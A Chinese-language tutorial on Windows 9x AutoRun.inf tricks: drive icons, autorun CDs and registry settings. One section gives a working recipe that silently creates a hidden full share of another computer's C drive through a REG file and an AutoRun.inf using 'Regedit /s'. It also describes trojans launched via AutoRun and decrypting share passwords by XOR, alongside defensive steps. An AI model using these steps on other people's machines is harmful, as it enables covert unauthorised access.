小提示：是否執行AutoRun功能其實由注冊表來決定。在“開始”菜單的“運行”中輸入Regedit，打開注冊表編輯器，展開到HKEY_CURRENT_USER SoftwareMicrosoftWindowsCurrentVersionPoliciesExploer主鍵下，右邊窗口中的二進制值“NoDriveTypeAutoRun”決定了是否執行AutoRun功能（包括硬盤和Ramdisk）。“NoDriveTypeAutoRun”默認鍵值為95 00 00 00。


 共享另一臺電腦的硬盤 

如果你希望共享另外一臺電腦的所有驅動器，可以利用我們剛剛提到的AutoRun.inf文件，前提是另外一臺電腦已經打開139共享。首先編寫一個REG文件，打開記事本，鍵入以下內容：

REGEDIT4

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

NetworkLanmanC$]

"Path"="C:\"

"Remark"=""

"Type"=dword:00000000

"Flags"=dword:00000302

 "Parmlenc"=hex:

 "Parm2enc"=hex: 

將以上部分另存為ShareC.reg文件備用。要特別注意第一行REGEDIT4要用大寫且頂格寫，在它后面要空上一行，在最后一行寫完后記得要按兩次回車鍵，即最后也要空上一行。 

然后編制一個AutoRun.inf文件，鍵入以下內容： 

[AutoRun]

Open=Regedit/s ShareC.reg 

加/s參數是為了導入時不會顯示任何提示信息，保存AutoRun.inf文件。將ShareC.reg和AutoRun.inf這兩個文件都復制到另一臺電腦的D盤的根目錄下，這樣對方只要雙擊D盤就會將ShareC.reg導入注冊表，在另一臺電腦重啟后C盤就會完全共享，要共享其他任何一個硬盤，方法都相同。

當心主動中木馬

一些別有用心的人，會在AutoRun.inf文件中，把“Open=ShareC.Reg”改成“Open=木馬服務端文件名”，然后把AutoRun.inf和配置好的木馬服務端一起復制到你的D盤的根目錄下，這樣不需你運行木馬服務端程序，而只要你雙擊了D盤就會使木馬運行。這樣做的好處顯而易見，那就是大大的增加了木馬運行的主動性，即使你非常警惕，不熟悉的文件輕易不會運行，也很難防范這種方法。那么要如何防范他人利用AutoRun.inf文件對你進行攻擊呢？

共享分類完全是由flags標志決定的，它的鍵值決定了共享目錄的類型。當flags=0x302時，重新啟動系統，目錄共享標志消失，表面上看沒有共享，實際上該目錄正處于完全共享狀態。網上流行的共享蠕蟲，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盤被共享了。 

 以上代碼中的Parmlenc、Parm2enc屬性項是加密的密碼，系統在加密時采用了8位密碼分別與“35 9a 4b a6 53 a9 d4 6a”進行異或運算，要想求出密碼再進行一次異或運算，然后查ASCII表可得出目錄密碼。

解決辦法是把HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanMan下面的“C$”、“D$”、“E$”等刪掉；然后刪除windowssystem下面的Vserver.vxd，它是Microsoft網絡上的文件與打印機共享虛擬設備驅動程序；再把HKEY_LOCAL_MACHINESystemCurrentCo-ntrolSetServicesVxD下的Vserver鍵值刪掉，就會很安全了。 

事實上，大多數的硬盤根目錄下并不需要AutoRun.inf文件來運行程序，因此我們完全可以將硬盤的AutoRun功能關閉，這樣即使在硬盤根目錄下有AutoRun.inf這個文件，Windows也不會去運行其中指定的程序，從而可以達到防止黑客利用AutoRun.inf文件入侵的目的。 

除此以外，我們還應讓Windows能顯示出隱藏的共享。大家都知道，在Windows 9X中設置共享時，通過在共享名后加上“$”這個符號，可使共享隱藏。比如，我們給一個名為share的計算機的C盤設置共享時，只要將其共享名設為C$，就看不到被共享的C盤，只有通過輸入該共享的確切路徑，才能訪問此共享。不過我們只要將電腦中的msnp32.dll文件稍做修改，就可以讓Windows顯示出隱藏的共享。

由于在Windows下msnp32.dll會被調用，不能直接修改此文件，所以第一步我們要復制msnp32.dll到C盤下并改名為msnp32，msnp32.dll在C:Windowssystem文件夾下。運行UltraEdit等十六進制文件編輯器打開msnp32，找到“24 56 E8 17”（位于偏移地址00003190～000031A0處），找到后將“24”改為“00”，然后保存，關閉UltraEdit。重啟計算機進入DOS模式，在命令提示符下輸入copy c:msnp32.dll c:Windowssystemmsnp32.dll，重啟進入Windows，現在雙擊share就能看見被隱藏的共享了。 

最后要提醒大家利用TCP/IP協議設計的NethackerⅡ等黑客軟件可以穿過Internet網絡，找到共享的主機，然后進行相應操作。所以當您通過Modem上網時，千萬要小心，因為一不小心，您的主機將完全共享給對方。防范這類事情發生的方法無非是經常檢查系統，給系統打上補丁，經常使用反黑殺毒軟件，上網時打開防火墻，注意異常現象，留意AutoRun.inf文件的內容，關閉共享或不要設置為完全共享，且加上復雜的共享密碼。
 

改變驅動器圖標

靈活應用AutoRun，有時可以給電腦帶來不少樂趣。比如，可以使用AutoRun來為某個驅動器指定漂亮的圖標。具體步驟如下：

步驟1:打開記事本，新建一個文件，在里面輸入如下內容：

[AutoRun]

ICON=C:WindowsSystemShell32.DLL,21

說明：Shell32.DLL是一個Windows系統文件，里面包含有很多Windows的系統圖標，21表示顯示為編號為21的圖標，當然你也可以自己制作一個圖標，只需要在“ICON”一行把路徑做相應修改即可。除了可以使用DLL文件中的圖標外，還能用EXE文件中的圖標，或直接使用ICO文件。

步驟2:將該文件存儲到需要更改圖標的磁盤的根目錄下面，命名為AutoRun.inf。

步驟3:閉記事本，在“我的電腦”里面按F5鍵刷新一下，就會看到驅動器被改變了圖標，

制作自運行個性CD

如果你經常刻錄光盤，那么利用AutoRun可以輕松地制作一張自啟動光盤，指定光盤自動運行光盤上的某個程序，只需要在某個文件夾下新建一個autorun.inf文件，里面的內容為：

[AutoRun]

OPEN=MyRun.BAT

ICON=Mylcon.ICO

其中MyRun.BAT、Mylcon.ICO分別是指定的需要自動運行的程序和圖標文件。最后把Autorun.inf、MyRun.BAT和Mylcon.ICO三個文件拖放到CD-R的根目錄中一并刻錄，刻出來的光盤被插入光驅后可以自動啟動根目錄下MyRun.BAT文件。而且在Windows“資源管理器”中顯示的是Mylcon.ICO圖標的樣子。

小提示：如果你將AutoRun.inf中的內容改為：

[AutoRun]

open=explorer.exe/n/e

那么這張光盤運行后會自動打開一個以“我的電腦”為主目錄的“資源管理器”窗口。

如果改為：

[AutoRun]

open=start.exeyourfilenme.html

那么該光盤運行后自動運行光盤中的yourname.html網頁文件。